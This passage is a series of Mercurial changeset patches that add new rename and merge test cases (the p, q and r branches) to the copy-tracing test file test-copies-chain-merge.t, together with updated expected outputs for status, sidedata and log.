+ A t + p R a R h + R p $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFGm-0")' M d $ hg status --copies --rev 'desc("f-2")' --rev 'desc("mGFm-0")' @@ -2192,9 +2249,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2203,7 +2260,7 @@ $ hg log -Gfr 'desc("mFGm-0")' d o g-1: update d | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2218,9 +2275,9 @@ | | o | f-1: rename h -> i |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2229,7 +2286,7 @@ $ hg log -Gfr 'desc("mGFm-0")' d o g-1: update d | - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | ~ #endif @@ -2255,9 +2312,9 @@ | | o | c-1 delete d |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2267,11 +2324,17 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCGm-0")' A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGCm-0")' A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCGm-0")' A d $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mGCm-0")' @@ -2300,9 +2363,9 @@ | | o | b-1: b update |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2313,12 +2376,18 @@ M b A d a (no-compatibility no-changeset !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' M b A d a (no-compatibility no-changeset !) 
+ A t + p R a + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-revert-m-0")' M b A d @@ -2346,9 +2415,9 @@ | | o | c-1 delete d | | - o | i-2: c -move-> d + o | i-2: c -move-> d, s -move-> t | | - o | i-1: a -move-> c + o | i-1: a -move-> c, p -move-> s |/ o i-0 initial commit: a b h @@ -2356,13 +2425,19 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCH-delete-before-conflict-m")' A d b (no-compatibility no-changeset !) + A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mHC-delete-before-conflict-m")' A d b + A t + p R a R b + R p $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCH-delete-before-conflict-m")' A d b @@ -2372,9 +2447,15 @@ b R b $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mCH-delete-before-conflict-m")' + A t + p R a + R p $ hg status --copies --rev 'desc("h-1")' --rev 'desc("mHC-delete-before-conflict-m")' + A t + p R a + R p Variant of previous with extra changes introduced by the merge -------------------------------------------------------------- @@ -2401,9 +2482,9 @@ | | o | a-1: d -move-> e |/ - o i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | o i-0 initial commit: a b h @@ -2493,14 +2574,20 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m-0")' A f a + A t + p R a R b + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m-0")' A f a (filelog !) b (no-filelog !) + A t + p R a R b + R p Decision from previous merge are properly chained with later merge @@ -2575,14 +2662,20 @@ a (filelog !) a (sidedata !) a (upgraded !) + A t + p R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-revert-m-0")' M b A d a (filelog !) a (sidedata !) a (upgraded !) + A t + p R a + R p chained output @@ -2592,32 +2685,44 @@ a (filelog !) a (missing-correct-output sidedata !) a (missing-correct-output upgraded !) 
+ A t + p A unrelated-l R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB+revert,Lm")' M b A d a (filelog !) a (missing-correct-output sidedata !) a (missing-correct-output upgraded !) + A t + p A unrelated-l R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,BC+revertm")' M b A d a (filelog !) a (missing-correct-output sidedata !) a (missing-correct-output upgraded !) + A t + p A unrelated-l R a + R p $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mL,CB+revertm")' M b A d a (filelog !) a (missing-correct-output sidedata !) a (missing-correct-output upgraded !) + A t + p A unrelated-l R a + R p Subcase: chaining "merged" information during a merge `````````````````````````````````````````````````````` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613764027 -3600 # Fri Feb 19 20:47:07 2021 +0100 # Node ID 067307d6589da42be47d8de787ba1d5840b10ef3 # Parent 0ebfd02dafd5f1aef5f1e8a51e44c0ebeff9e86b test-copies: add a `p` branch similar to the `a` but on the new files This branch will be used to create merge case that mirror ones involving the `a` branch. Differential Revision: https://phab.mercurial-scm.org/D10055 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -193,6 +193,29 @@ | o i-0 initial commit: a b h + $ hg up -q null + +Having a branch similar to the 'a' one, but moving the 'p' file around. + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv t u + $ hg ci -Am 'p-1: t -move-> u' + created new head + $ hg mv u v + $ hg ci -Am 'p-2: u -move-> v' + $ hg log -G --rev '::.' 
+ @ p-2: u -move-> v + | + o p-1: t -move-> u + | + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + $ hg up -q null Setup all merge =============== @@ -209,7 +232,7 @@ $ case_desc="simple merge - A side: multiple renames, B side: unrelated update" $ hg up 'desc("b-1")' - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("a-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) @@ -1186,6 +1209,8 @@ mO,FGm: chained merges (copy-overwrite -> simple) - same content n-1: unrelated changes (based on the "f" series of changes) o-1: unrelated changes (based on "g" changes) + p-1: t -move-> u + p-2: u -move-> v Test that sidedata computations during upgrades are correct @@ -1316,6 +1341,18 @@ '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00fg' added p1: f, g; removed : g, ; + ##### revision "p-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00tu' + removed : t, ; + added p1: u, t; + ##### revision "p-2" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00uv' + removed : u, ; + added p1: v, u; ##### revision "mBAm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613764035 -3600 # Fri Feb 19 20:47:15 2021 +0100 # Node ID eb60dadd1be1ab94e3a7e652ecd9e3835e054155 # Parent 067307d6589da42be47d8de787ba1d5840b10ef3 test-copies: add a `q` branch similar to the `e` but on the new files This branch will be used to create merge case that mirror ones involving the `e` branch. 
Differential Revision: https://phab.mercurial-scm.org/D10056 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -217,6 +217,28 @@ $ hg up -q null +Having another branch renaming a different file to the same filename as another + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv r w + $ hg ci -m 'q-1 r -move-> w' + created new head + $ hg mv w v + $ hg ci -m 'q-2 w -move-> v' + $ hg log -G --rev '::.' + @ q-2 w -move-> v + | + o q-1 r -move-> w + | + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + $ hg up -q null + Setup all merge =============== @@ -1211,6 +1233,8 @@ o-1: unrelated changes (based on "g" changes) p-1: t -move-> u p-2: u -move-> v + q-1 r -move-> w + q-2 w -move-> v Test that sidedata computations during upgrades are correct @@ -1353,6 +1377,18 @@ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00uv' removed : u, ; added p1: v, u; + ##### revision "q-1 r -move-> w" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rw' + removed : r, ; + added p1: w, r; + ##### revision "q-2 w -move-> v" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00vw' + added p1: v, w; + removed : w, ; ##### revision "mBAm-0 simple merge - A side" ##### 1 sidedata entries entry-0014 size 4 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613763993 -3600 # Fri Feb 19 20:46:33 2021 +0100 # Node ID a1273bea99cc91f16ef1a2d081ac119a3a8f0137 # Parent eb60dadd1be1ab94e3a7e652ecd9e3835e054155 test-copies: introduce case combining the `p` and `q` branch That case involves conflicting copies information from each branch. 
It is similar to the `mAEm` / `mEAm` case except this case actual content merge is involved too. Differential Revision: https://phab.mercurial-scm.org/D10057 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -422,6 +422,49 @@ o i-0 initial commit: a b h +Subcase: new copy information on both side with an actual merge happening +````````````````````````````````````````````````````````````````````````` + +- the "p-" branch renaming 't' to 'v' (through 'u') +- the "q-" branch renaming 'r' to 'v' (through 'w') + + $ case_desc="merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content)" + + $ hg up 'desc("p-2")' + 3 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ hg merge 'desc("q-2")' --tool ':union' + merging v + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mPQm-0 $case_desc - one way" + $ hg up 'desc("q-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("p-2")' --tool ':union' + merging v + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mQPm-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' + o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + |\ + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + Subcase: existing copy information overwritten on one branch 
```````````````````````````````````````````````````````````` @@ -459,8 +502,9 @@ (branch merge, don't forget to commit) $ hg ci -m "mFBm-0 $case_desc - the other way" created new head + $ hg up null --quiet $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - @ mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ @@ -491,8 +535,7 @@ $ case_desc="actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content" $ hg up 'desc("i-2")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo "some update" >> d $ hg commit -m "g-1: update d" created new head @@ -1229,6 +1272,8 @@ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) mN,GFm: chained merges (copy-overwrite -> simple) - same content mO,FGm: chained merges (copy-overwrite -> simple) - same content + mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way n-1: unrelated changes (based on the "f" series of changes) o-1: unrelated changes (based on "g" changes) p-1: t -move-> u @@ -1433,6 +1478,16 @@ entry-0014 size 14 '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f' merged : f, ; + ##### revision "mPQm-0 merge with copies info on both side - P side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v' + merged : v, ; 
+ ##### revision "mQPm-0 merge with copies info on both side - P side" ##### + 1 sidedata entries + entry-0014 size 14 + '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v' + merged : v, ; ##### revision "f-1" ##### 1 sidedata entries entry-0014 size 24 @@ -2364,6 +2419,134 @@ ~ #endif +Subcase: new copy information on both side with an actual merge happening +````````````````````````````````````````````````````````````````````````` + +- the "p-" branch renaming 't' to 'v' (through 'u') +- the "q-" branch renaming 'r' to 'v' (through 'w') + + + $ hg log -G --rev '::(desc("mPQm")+desc("mQPm"))' + o mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + |\ + +---o mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + | |/ + | o q-2 w -move-> v + | | + | o q-1 r -move-> w + | | + o | p-2: u -move-> v + | | + o | p-1: t -move-> u + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + +#if no-changeset + $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v' + 0946c662ef16e4e67397fd717389eb6693d41749 644 v + $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v' + 0db3aad7fcc1ec27fab57060e327b9e864ea0cc9 644 v + $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v' + 3f91841cd75cadc9a1f1b4e7c1aa6d411f76032e 644 v + $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v' + c43c088b811fd27983c0a9aadf44f3343cd4cd7e 644 v + $ hg debugindex v | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * 3f91841cd75c 000000000000 000000000000 + 1 * c43c088b811f 000000000000 000000000000 + 2 * 0946c662ef16 3f91841cd75c c43c088b811f + 3 * 0db3aad7fcc1 c43c088b811f 3f91841cd75c +#else + $ hg manifest --debug --rev 'desc("mPQm-0")' | grep '644 v' + 65fde9f6e4d4da23b3f610e07b53673ea9541d75 644 v + $ hg manifest --debug --rev 'desc("mQPm-0")' | grep '644 v' + 
a098dda6413aecf154eefc976afc38b295acb7e5 644 v + $ hg manifest --debug --rev 'desc("p-2")' | grep '644 v' + 5aed6a8dbff0301328c08360d24354d3d064cf0d 644 v + $ hg manifest --debug --rev 'desc("q-2")' | grep '644 v' + a38b2fa170219750dac9bc7d19df831f213ba708 644 v + $ hg debugindex v | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * 5aed6a8dbff0 000000000000 000000000000 + 1 * a38b2fa17021 000000000000 000000000000 + 2 * 65fde9f6e4d4 5aed6a8dbff0 a38b2fa17021 + 3 * a098dda6413a a38b2fa17021 5aed6a8dbff0 +#endif + +# Here the filelog based implementation is not looking at the rename +# information (because the file exist on both side). However the changelog +# based on works fine. We have different output. + + $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mPQm-0")' + M v + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("p-2")' --rev 'desc("mQPm-0")' + M v + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mPQm-0")' + M v + t (no-filelog !) + R t + $ hg status --copies --rev 'desc("q-2")' --rev 'desc("mQPm-0")' + M v + t (no-filelog !) + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("p-2")' + A v + t + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("q-2")' + A v + r + R r + +# From here, we run status against revision where both source file exists. +# +# The filelog based implementation picks an arbitrary side based on revision +# numbers. So the same side "wins" whatever the parents order is. This is +# sub-optimal because depending on revision numbers means the result can be +# different from one repository to the next. +# +# The changeset based algorithm use the parent order to break tie on conflicting +# information and will have a different order depending on who is p1 and p2. +# That order is stable accross repositories. 
(data from p1 prevails) + + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mPQm-0")' + A v + t + R r + R t + $ hg status --copies --rev 'desc("i-2")' --rev 'desc("mQPm-0")' + A v + t (filelog !) + r (no-filelog !) + R r + R t + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mPQm-0")' + A d + a + A v + r (filelog !) + p (no-filelog !) + R a + R p + R r + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mQPm-0")' + A d + a + A v + r + R a + R p + R r + Comparing with merging with a deletion (and keeping the file) ------------------------------------------------------------- # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613991418 -3600 # Mon Feb 22 11:56:58 2021 +0100 # Node ID c7baff95808cecbdcb48b7502bb37f0e6e8452d0 # Parent a1273bea99cc91f16ef1a2d081ac119a3a8f0137 test-copies: add a case involving the `b` and a new `r` branch That case involve a branch overwriting copies information from the other one. It is similar to the `mBFm` / `mFBm` case except this case actual content merge is involved too. 
Differential Revision: https://phab.mercurial-scm.org/D10058 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -521,6 +521,60 @@ o i-0 initial commit: a b h +Subcase: existing copy information overwritten on one branch, with different content) +````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch + + $ case_desc="simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content" + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv r x + $ hg commit -m "r-1: rename r -> x" + created new head + $ hg mv --force x t + $ hg commit -m "r-2: rename t -> x" + $ hg debugindex t | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d74efbf65309 000000000000 000000000000 (no-changeset !) + 1 * 02a930b9d7ad 000000000000 000000000000 (no-changeset !) + 0 * 5aed6a8dbff0 000000000000 000000000000 (changeset !) + 1 * a38b2fa17021 000000000000 000000000000 (changeset !) 
+ $ hg up 'desc("b-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("r-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mBRm-0 $case_desc - one way" + $ hg up 'desc("r-2")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mRBm-0 $case_desc - the other way" + created new head + $ hg up null --quiet + $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))' + o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + |\ + +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + | |/ + | o r-2: rename t -> x + | | + | o r-1: rename r -> x + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + Subcase: reset of the copy history on one side `````````````````````````````````````````````` @@ -1244,6 +1298,7 @@ mBCm-1 re-add d mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists) mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way @@ -1274,12 +1329,15 @@ mO,FGm: chained merges (copy-overwrite -> 
simple) - same content mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way n-1: unrelated changes (based on the "f" series of changes) o-1: unrelated changes (based on "g" changes) p-1: t -move-> u p-2: u -move-> v q-1 r -move-> w q-2 w -move-> v + r-1: rename r -> x + r-2: rename t -> x Test that sidedata computations during upgrades are correct @@ -1508,6 +1566,26 @@ 1 sidedata entries entry-0014 size 4 '\x00\x00\x00\x00' + ##### revision "r-1" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rx' + removed : r, ; + added p1: x, r; + ##### revision "r-2" ##### + 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00tx' + touched p1: t, x; + removed : x, ; + ##### revision "mBRm-0 simple merge - B side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' + ##### revision "mRBm-0 simple merge - B side" ##### + 1 sidedata entries + entry-0014 size 4 + '\x00\x00\x00\x00' ##### revision "g-1" ##### 1 sidedata entries entry-0014 size 14 @@ -2160,6 +2238,104 @@ ~ #endif + +Subcase: existing copy information overwritten on one branch, with different content) +````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch + + $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))' + o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the 
other way + |\ + +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + | |/ + | o r-2: rename t -> x + | | + | o r-1: rename r -> x + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBRm-0")' + M b + A d + a + A t + r + R a + R p + R r + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mRBm-0")' + M b + A d + a + A t + r + R a + R p + R r + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBRm-0")' + M t + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mBRm-0")' + M b + $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mBRm-0")' + M b + M t + x (no-filelog !) + R x + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mRBm-0")' + M t + r (no-filelog !) + R r + $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mRBm-0")' + M b + $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mRBm-0")' + M b + M t + x (no-filelog !) 
+ R x + +#if no-changeset + $ hg log -Gfr 'desc("mBRm-0")' d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mBRm-0")' d + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + +#if no-changeset + $ hg log -Gfr 'desc("mRBm-0")' d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + +#else +BROKEN: `hg log --follow <file>` relies on filelog metadata to work + $ hg log -Gfr 'desc("mRBm-0")' d + o i-2: c -move-> d, s -move-> t + | + ~ +#endif + Subcase: reset of the copy history on one side `````````````````````````````````````````````` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613992860 -3600 # Mon Feb 22 12:21:00 2021 +0100 # Node ID 388a92023a1afdb38e6c6ed4f2100287c2af59c9 # Parent c7baff95808cecbdcb48b7502bb37f0e6e8452d0 test-copies: introduce merge chains test for the P/Q merges This is similar to the chaining test we have for the A/E merges. The current result of this tests is wrong, as for the other test of the same familly. This will be fixed by a later changesets. Differential Revision: https://phab.mercurial-scm.org/D10059 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -998,6 +998,105 @@ o i-0 initial commit: a b h +Subcase: chaining conflicting rename resolution, with actual merging happening +`````````````````````````````````````````````````````````````````````````````` + +The "mPQm" and "mQPm" case create a rename tracking conflict on file 't'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 't' and the arbitration done within "mPQm" and "mQP" +about that file should stay unchanged. 
+ + $ case_desc="chained merges (conflict -> simple) - different content" + +(extra unrelated changes) + + $ hg up 'desc("p-2")' + 3 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ echo s > unrelated-s + $ hg add unrelated-s + $ hg ci -m 's-1: unrelated changes (based on the "p" series of changes)' + created new head + + $ hg up 'desc("q-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ echo t > unrelated-t + $ hg add unrelated-t + $ hg ci -m 't-1: unrelated changes (based on "q" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mPQm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ hg merge 'desc("t-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mPQ,Tm: $case_desc" + +(merge variant 2) + + $ hg up 'desc("t-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ hg merge 'desc("mPQm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mT,PQm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mQPm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("s-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mQP,Sm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("s-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mQPm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mS,QPm: $case_desc" + created new head + $ hg up null --quiet + + + $ hg log -G --rev '::(desc("mPQ,Tm") + desc("mT,PQm") + desc("mQP,Sm") + desc("mS,QPm"))' + o mS,QPm: chained merges (conflict -> simple) - different content + |\ + +---o mQP,Sm: chained merges 
(conflict -> simple) - different content + | |/ + | | o mT,PQm: chained merges (conflict -> simple) - different content + | | |\ + | | +---o mPQ,Tm: chained merges (conflict -> simple) - different content + | | | |/ + | | | o t-1: unrelated changes (based on "q" changes) + | | | | + | o | | s-1: unrelated changes (based on the "p" series of changes) + | | | | + o-----+ mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + |/ / / + | o / mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + |/|/ + | o q-2 w -move-> v + | | + | o q-1 r -move-> w + | | + o | p-2: u -move-> v + | | + o | p-1: t -move-> u + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h + + Subcase: chaining salvage information during a merge ```````````````````````````````````````````````````` @@ -1009,7 +1108,7 @@ (creating the change) $ hg up 'desc("c-1")' - 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + 5 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo l > unrelated-l $ hg add unrelated-l $ hg ci -m 'l-1: unrelated changes (based on "c" changes)' @@ -1327,9 +1426,13 @@ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists) mN,GFm: chained merges (copy-overwrite -> simple) - same content mO,FGm: chained merges (copy-overwrite -> simple) - same content + mPQ,Tm: chained merges (conflict -> simple) - different content mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + mQP,Sm: chained merges (conflict -> simple) - different content mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the 
